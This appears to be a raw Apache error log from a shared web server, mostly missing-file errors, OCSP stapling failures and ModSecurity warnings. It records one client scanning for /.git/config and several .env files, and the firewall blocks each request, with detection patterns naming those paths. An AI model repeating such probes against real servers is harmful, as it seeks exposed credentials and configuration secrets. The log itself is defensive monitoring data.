[Mon May 11 18:03:45.144262 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH94UWKUxpmnkK7zHyijQAAAQY"]
[Mon May 11 18:03:45.336062 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:45.520416 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:45.682285 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:45.927028 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:46.096036 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:46.283631 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:46.469231 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:46.631338 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:46.797678 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:47.048812 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:47.215115 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:47.382436 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:47.634771 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:47.830795 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:48.000692 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:48.164981 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:48.337441 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:48.507360 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:48.672312 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:48.836543 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:49.014878 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:49.224668 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:49.391912 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:49.572894 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:49.863038 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:50.086850 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:50.252974 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:50.432287 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:50.682593 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:51.333893 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:51.510847 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:51.712656 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:51.888000 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:52.061731 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:52.233877 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:52.495143 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:52.666886 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:52.834400 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:53.023116 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:53.196147 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:53.359501 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:53.525889 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:53.886864 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:54.059248 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:54.225041 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:54.493583 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:54.675771 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:54.838768 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:03:55.038495 2026] [:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:04:44.269571 2026] [proxy_fcgi:error] [pid 1411055:tid 1411069] [client 20.63.32.193:11364] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:05:37.246781 2026] [security2:error] [pid 1411055:tid 1411074] [client 43.128.73.132:45578] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.letamsgarage.fr"] [uri "/"] [unique_id "agH-UUWKUxpmnkK7zHyjhgAAARE"]
[Mon May 11 18:05:38.832198 2026] [ssl:error] [pid 1412074:tid 1412090] (EAI 2)Name or service not known: [client 216.157.40.64:63624] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:05:38.832268 2026] [ssl:error] [pid 1412074:tid 1412090] AH01941: stapling_renew_response: responder error
[Mon May 11 18:05:40.103444 2026] [ssl:error] [pid 1424905:tid 1424925] (EAI 2)Name or service not known: [client 216.157.40.64:9467] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:05:40.103496 2026] [ssl:error] [pid 1424905:tid 1424925] AH01941: stapling_renew_response: responder error
[Mon May 11 18:05:40.518668 2026] [ssl:error] [pid 1416109:tid 1416141] (EAI 2)Name or service not known: [client 216.157.41.79:27513] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:05:40.518836 2026] [ssl:error] [pid 1416109:tid 1416141] AH01941: stapling_renew_response: responder error
[Mon May 11 18:05:40.733244 2026] [ssl:error] [pid 1411201:tid 1411259] (EAI 2)Name or service not known: [client 216.157.41.93:62995] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:05:40.733299 2026] [ssl:error] [pid 1411201:tid 1411259] AH01941: stapling_renew_response: responder error
[Mon May 11 18:05:40.762431 2026] [ssl:error] [pid 1424905:tid 1424919] (EAI 2)Name or service not known: [client 216.157.40.94:47714] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:05:40.762465 2026] [ssl:error] [pid 1424905:tid 1424919] AH01941: stapling_renew_response: responder error
[Mon May 11 18:05:41.160884 2026] [ssl:error] [pid 1424905:tid 1424932] (EAI 2)Name or service not known: [client 216.157.41.71:42054] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:05:41.160920 2026] [ssl:error] [pid 1424905:tid 1424932] AH01941: stapling_renew_response: responder error
[Mon May 11 18:05:41.394440 2026] [ssl:error] [pid 1416109:tid 1416145] (EAI 2)Name or service not known: [client 216.157.40.69:63621] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:05:41.394481 2026] [ssl:error] [pid 1416109:tid 1416145] AH01941: stapling_renew_response: responder error
[Mon May 11 18:05:41.587598 2026] [ssl:error] [pid 1411099:tid 1411116] (EAI 2)Name or service not known: [client 216.157.41.87:18800] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:05:41.587643 2026] [ssl:error] [pid 1411099:tid 1411116] AH01941: stapling_renew_response: responder error
[Mon May 11 18:05:41.717206 2026] [ssl:error] [pid 1424905:tid 1424908] (EAI 2)Name or service not known: [client 216.157.40.64:44091] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:05:41.717241 2026] [ssl:error] [pid 1424905:tid 1424908] AH01941: stapling_renew_response: responder error
[Mon May 11 18:05:42.067208 2026] [ssl:error] [pid 1411055:tid 1411080] (EAI 2)Name or service not known: [client 216.157.40.92:17193] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:05:42.067259 2026] [ssl:error] [pid 1411055:tid 1411080] AH01941: stapling_renew_response: responder error
[Mon May 11 18:05:42.707674 2026] [ssl:error] [pid 1411201:tid 1411267] (EAI 2)Name or service not known: [client 216.157.40.92:31518] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:05:42.707718 2026] [ssl:error] [pid 1411201:tid 1411267] AH01941: stapling_renew_response: responder error
[Mon May 11 18:05:43.293343 2026] [security2:error] [pid 1412074:tid 1412094] [client 43.128.73.132:52676] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.letamsgarage.fr"] [uri "/"] [unique_id "agH-VzJnyuKVXoStDhbZMwAAAFI"], referer: http://www.letamsgarage.fr
[Mon May 11 18:05:43.350632 2026] [ssl:error] [pid 1411099:tid 1411110] (EAI 2)Name or service not known: [client 216.157.40.64:20187] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:05:43.350679 2026] [ssl:error] [pid 1411099:tid 1411110] AH01941: stapling_renew_response: responder error
[Mon May 11 18:05:48.757122 2026] [security2:error] [pid 1411201:tid 1411260] [client 43.128.73.132:60088] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agH-XPy_GXSWIKeli0sX5QAAAI4"], referer: https://www.letamsgarage.fr/
[Mon May 11 18:06:05.416552 2026] [:error] [pid 1411201:tid 1411260] [client 77.75.77.72:30284] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:06:32.700854 2026] [autoindex:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 18:06:33.890306 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.git/config"] [unique_id "agH-iYW8yzYoWG_eyCW6PAAAAUg"]
[Mon May 11 18:06:33.890697 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.git/config"] [unique_id "agH-iYW8yzYoWG_eyCW6PAAAAUg"]
[Mon May 11 18:06:33.891093 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-iYW8yzYoWG_eyCW6PAAAAUg"]
[Mon May 11 18:06:34.406629 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agH-ioW8yzYoWG_eyCW6PgAAAUg"]
[Mon May 11 18:06:34.406866 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agH-ioW8yzYoWG_eyCW6PgAAAUg"]
[Mon May 11 18:06:34.407181 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-ioW8yzYoWG_eyCW6PgAAAUg"]
[Mon May 11 18:06:34.661541 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.local"] [unique_id "agH-ioW8yzYoWG_eyCW6PwAAAUg"]
[Mon May 11 18:06:34.661780 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.local"] [unique_id "agH-ioW8yzYoWG_eyCW6PwAAAUg"]
[Mon May 11 18:06:34.662079 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-ioW8yzYoWG_eyCW6PwAAAUg"]
[Mon May 11 18:06:34.934657 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.production"] [unique_id "agH-ioW8yzYoWG_eyCW6QQAAAUg"]
[Mon May 11 18:06:34.934883 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.production"] [unique_id "agH-ioW8yzYoWG_eyCW6QQAAAUg"]
[Mon May 11 18:06:34.935198 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-ioW8yzYoWG_eyCW6QQAAAUg"]
[Mon May 11 18:06:35.347400 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.staging"] [unique_id "agH-i4W8yzYoWG_eyCW6QgAAAUg"]
[Mon May 11 18:06:35.347662 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.staging"] [unique_id "agH-i4W8yzYoWG_eyCW6QgAAAUg"]
[Mon May 11 18:06:35.347976 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-i4W8yzYoWG_eyCW6QgAAAUg"]
[Mon May 11 18:06:35.603994 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.development"] [unique_id "agH-i4W8yzYoWG_eyCW6QwAAAUg"]
[Mon May 11 18:06:35.604250 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.development"] [unique_id "agH-i4W8yzYoWG_eyCW6QwAAAUg"]
[Mon May 11 18:06:35.604539 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-i4W8yzYoWG_eyCW6QwAAAUg"]
[Mon May 11 18:06:35.885671 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.test"] [unique_id "agH-i4W8yzYoWG_eyCW6RAAAAUg"]
